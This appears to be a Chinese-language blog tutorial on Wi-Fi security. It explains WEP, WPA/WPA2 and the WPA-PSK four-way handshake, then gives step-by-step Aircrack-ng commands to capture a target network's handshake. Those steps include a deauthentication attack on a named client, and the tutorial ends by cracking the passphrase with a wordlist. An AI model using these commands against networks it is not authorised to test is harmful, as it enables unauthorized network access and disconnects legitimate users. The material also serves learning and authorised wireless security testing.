声明:本文仅供学习交流使用!
wifi 标准以及相应标准的特征汇总表
无线安全技术
1) WEP(Wired Equivalent Privacy有线对等保密)
最早的无线加密体制,由于算法的缺陷很容易被破解。抓包获取在数据流中明文传输的IV,再通过统计学方法用IV得到密钥。2) WPA
在不升级硬件的前提下,WAP使用TKIP(Temporal Key Integrity Protocol临时密钥集成协议) 来实现WLAN的访问控制、密钥管理和数据加密来增强WEP的安全性。WPA加密算法有两个版本。
a) WPA = 802.1x + EAP + TKIP + MIC = Pre-shared Key + TKIP + MIC
b) WPA2 = 802.1x + EAP + AES + CCMP = Pre-shared Key + AES + CCMP注:
802.1x + EAP、Pre-shared Key:身份校验算法
TKIP、AES:数据传输加密算法
MIC、CCMP:数据完整性校验算法802.1x + EAP (工业级的,安全要求高的地方用。需要认证服务器)EAP 扩展认证协议,是一种架构,而不是具体算法。常见的有LEAP,MD5,TTLS,TLS,PEAP,SRP,SIM,AKA 其中的TLS 和TTLS 是双向认证模式。这种认证方式不怕网络劫持和字典攻击。
Pre-shared Key (家庭用的,用在安全要求低的地方。不需要服务器)。容易被字典攻击WPA-PSK
1) WPA的四次握手过程
WPA 握手过程是基于802.1X 协议,使用eapol key进行封装传输。
a) AP初始化:
使用 SSID 和passphares作为入参,通过哈希算法产生PSK。在WPA-PSK 中PSK=PMK=pdkdf2_SHA1(passphrase, SSID, SSID length, 4096)b) 第一次握手:
AP广播SSID,AP_MAC(AA);
STATION 端使用接收到的SSID,AP_MAC和passphares使用同样算法产生PSK。c) 第二次握手
STATION 发送一个随机数SNonce,STATION_MAC(SA)给AP;
AP端接收到SNonce、STATION_MAC(SA)后产生一个随机数ANonce,然后用 PMK、AP_MAC(AA)、STATION_MAC(SA)、SNonce、ANonce 用以下SHA1_PRF算法产生PTK,提取这个 PTK 前16 个字节组成一个MIC KEY。
PTK=SHA1_PRF(PMK, Len(PMK), “Pairwise key expansion”, MIN(AA, SA) || Max(AA, SA) || Min(ANonce, SNonce) || Max(ANonce, SNonce))d) 第三次握手:
AP发送上面产生的ANonce给STATION
STATION 端用接收到ANonce 和以前产生PMK、SNonce、AP_MAC(AA)、STATION_MAC(SA)用同样的算法产生PTK。提取这个PTK 前16 个字节组成一个MIC KEY使用以下算法产生MIC值用这个MIC KEY 和一个802.1X数据帧使用以下算法得到MIC值
MIC = HMAC_MD5(MIC Key,16,802.1X data)e) 第四次握手:
STATION 发送802.1X 数据帧,MIC给AP;STATION 端用上面那个准备好的802.1X 数据帧在最后填充上MIC值和两个字节的0(十六进制)然后发送这个数据帧到AP。
AP端收到这个数据帧后提取这个MIC。并把这个数据帧的MIC部分都填上0(十六进制)这时用这个802.1X数据帧,和用上面AP产生的 MIC KEY 使用同样的算法得出MIC’。如果MIC’等于STATION 发送过来的MIC。那么第四次握手成功。若不等说明则AP 和 STATION 的密钥不相同,握手失败了。2) WPA—PSK破解原理
用我们字典中的Passphrase+SSID先生成PMK,然后结合握手包中的STA_MAC、AP_MAC、ANONCE、SNONCE计算PTK,再加上原始的报文数据算出MIC并与AP发送的MIC比较,如果一致,那么该PSK就是密钥。破解过程
环境:Kali Linux 2.0、USB无线网卡
工具:Aircrack-ng1) 第一步:把usb网卡插入虚拟机,并开启网卡到监听模式,命令如下:
airmon-ng start ra0(ra0为无线网卡名称)注:如果虚拟机无法识别无线网卡需安装驱动,教程链接:http://blog.csdn.net/swjtu100/article/details/50543260
2) 第二步:抓包查看所在区域无线网的状态,选择需破解的目标网络,命令如下:
airodump-ng ra0
3) 第三步:抓取目标网络的握手包,命令如下:
airodump-ng - c 1 –bssid EC:17:2F:FA:F0:CA - w /root/Desktop/ ra0参数解释:-c:监听频道 –bssid 目标AP网络mac值 -w:保存监听事件的文件名
4) 第四步:重新打开一个terminal窗口,使用DEAUTH攻击使已经连接的客户端断开并重新连接,以产生握手包。(注意:抓握手包破解必须有合法的客户端才行)命令如下:
aireplay-ng -0 10 -a EC:17:2F:FA:F0:CA -c DC:EE:06:1F:BB:AF ra0参数解释:- 0 deauth攻击 10:进行10次攻击 -a:AP的MAC地址 -c:已连接该AP的客户端MAC地址
当获取到握手包时会出现红框内的信息
5) 第五步:通过四次握手包和字典(metasploit自带的字典)破解密码,命令如下:
aircrack-ng -a2 -b EC:17:2F:FA:F0:CA -w /usr/share/metasploit-framework/data/john/
wordlists/password.lst /root/Desktop/-01.cap参数解释:-a2 WPA的方法破解握手包 -w:字典路径 -01.cap: 第四步中抓取的握手包文件名
破解成功!
参考:
http://www.freebuf.com/articles/wireless/58342.html
http://blog.csdn.net/ivan_/article/details/39205371
http://null-byte.wonderhowto.com/how-to/wi-fi-hacking/
http://lewiscomputerhowto.blogspot.in/2014/06/how-to-hack-wpawpa2-wi-fi-with-kali.html